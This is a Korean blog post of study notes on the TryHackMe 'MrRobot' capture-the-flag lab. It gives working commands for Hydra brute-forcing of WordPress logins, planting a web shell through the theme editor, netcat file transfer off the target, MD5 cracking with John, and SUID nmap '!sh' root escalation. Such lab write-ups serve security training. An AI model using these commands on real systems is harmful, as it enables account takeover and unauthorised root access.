OSCP/TryHackMe

[Linux] MrRobot

우와해커 2020. 5. 13. 16:19

정보탐색

NMAP, WpScan, Nikto

 

배운점

1. Recon할 때, nikto를 활용하는 점 잊지 말자

2. 로컬권한상승을 위해 취약점 탐색용으로 LinEnum 스크립트를 활용할 수 있다.

3. WPSCAN(xmlrpc 이용한 로그인 브루트포스를 지원한다.)

4. 터미널에서 export TERM=screen 입력하면 clear 명령어를 사용할 수 있다.

 


히드라(웹 폼 브루트포스)
- 성공,실패 메세지 유무를 통해 아이디 존재도 확인 가능함.

아이디 브루트 포싱(S:성공, F:실패시 메세지, 생략시 실패시 메세지)
hydra -L 파일명 -p qwerqweqwrqwe 아이피 -V http-form-post 'wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Login+In&testcookie=1:S=Location'
* 존재하는 계정에 대한 응답이 다를 경우, S값을 정의하여 정의된 아이디를 알아낼 수 있다.

비번 브루트 포싱
hydra -l elliot -P ./test.txt 아이피 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Login+In&testcookie=1:incorrect'

 

워드프레스-웹쉘

- 에디터 페이지를 웹쉘 코드로 수정 후 active하여 접근

 

 

파일전송(netcat)

 

- 보내는 쪽

nc -nlvp 4444 > md5.txt(저장될 파일명 입력) 

- 받는 쪽

nc -nv 10.0.0.22 4444 < md5.txt (전송할 파일 리다이렉션으로 넘겨줌)

 

 

john the ripper 또는 hashcat

존더리퍼 왜 안되냥?
=> Raw-MD5를 Raw-MD5u로 수정하니까 됨.

./john --wordlist=/THM/MrRobot/fsocity.dic /THM/MrRobot/md5.txt --format=Raw-MD5u

 

=> 비밀번호 왜 틀리냐?
대문자로 출력되었지만 소문자로 입력하니까 성공함..
ㅅㅂ 불확실하니까... 시험때는 hashcat도 같이 사용하는게 좋을 것 같음

 

 

 

권한상승 suid


find / -perm -4000 2>/dev/null

 

nmap 발견
nmap --interactive
nmap> !sh

 

참고
https://gtfobins.github.io/gtfobins/nmap/

 

 

다른사람 권한상승
1. 로컬 웹서버 -> linEnum 스크립트 이동
2. 피해자 tmp에 LinEnum 스크립트 다운로드
3. suid 찾고 nmap으로 exploit 성공

 

 

'OSCP > TryHackMe' 카테고리의 다른 글

[Linux] Erit Securus I (Excellent walkthrough)  (0) 2020.06.04
[Linux] Borderlands (미완료, CTF스타일, Pivot연습용)  (0) 2020.06.03
Hacking with Powershell  (0) 2020.05.06
[Linux] Daily Bugle  (0) 2020.04.25
[Linux] Skynet  (0) 2020.04.23